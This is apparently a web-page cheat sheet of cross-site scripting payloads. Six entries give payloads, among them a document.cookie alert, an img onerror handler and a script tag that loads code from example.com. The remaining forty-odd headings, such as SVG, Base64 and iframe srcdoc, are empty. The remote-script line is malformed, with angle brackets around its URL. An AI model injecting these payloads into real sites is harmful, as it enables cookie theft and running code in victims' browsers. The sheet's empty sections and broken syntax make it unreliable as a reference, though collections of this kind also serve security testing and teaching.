⛑️Crafting XSS Payloads

Basic Alert:

<script>alert('XSS')</script>

Document Cookie Access:

<script>alert(document.cookie)</script>

JavaScript Execution:

<img src=x onerror=alert('XSS')>

Using JavaScript URI:

javascript:alert('XSS')

Executing Code from External Source:

<script src="<http://example.com/xss.js>"></script>

HTML Injection:

<div onclick="alert('XSS')">Click me</div>

Event Handler:

Using SVG:

Embedding in Style Tags:

Using Iframe:

Non-Alpha-Non-Digit XSS:

Using document.domain:

Using HTML Entities:

Breaking out of HTML Attributes:

Using eval():

Breaking out of URL Parameters:

Using Base64:

Exploiting innerHTML:

Using setTimeout:

UTF-8 Encoded Payloads:

Using Object Tags:

Using Embed Tags:

Utilizing onmouseover:

Using onfocus:

Utilizing onerror with Invalid Image Source:

Malformed HTML Tags:

Using srcdoc in Iframe:

Exploiting onload in Body Tag:

Encoding with Decimal HTML Entities:

Using data: URI:

Using Unicode:

Breaking Out of Script Context:

Using onerror with Script Tags:

Using MathML:

Exploiting ContentEditable:

Using document.write:

Exploiting ondblclick:

Using VBScript in IE:

Utilizing execScript in IE:

Using XML Entities:

Exploiting onblur:

Using onchange:

Using onsubmit:

Breaking Out of CSS Context:

Using Frame Source:

Utilizing document.domain with iframe:

Exploiting onresize:

Using onclick:

Exploiting href with JavaScript:

Last updated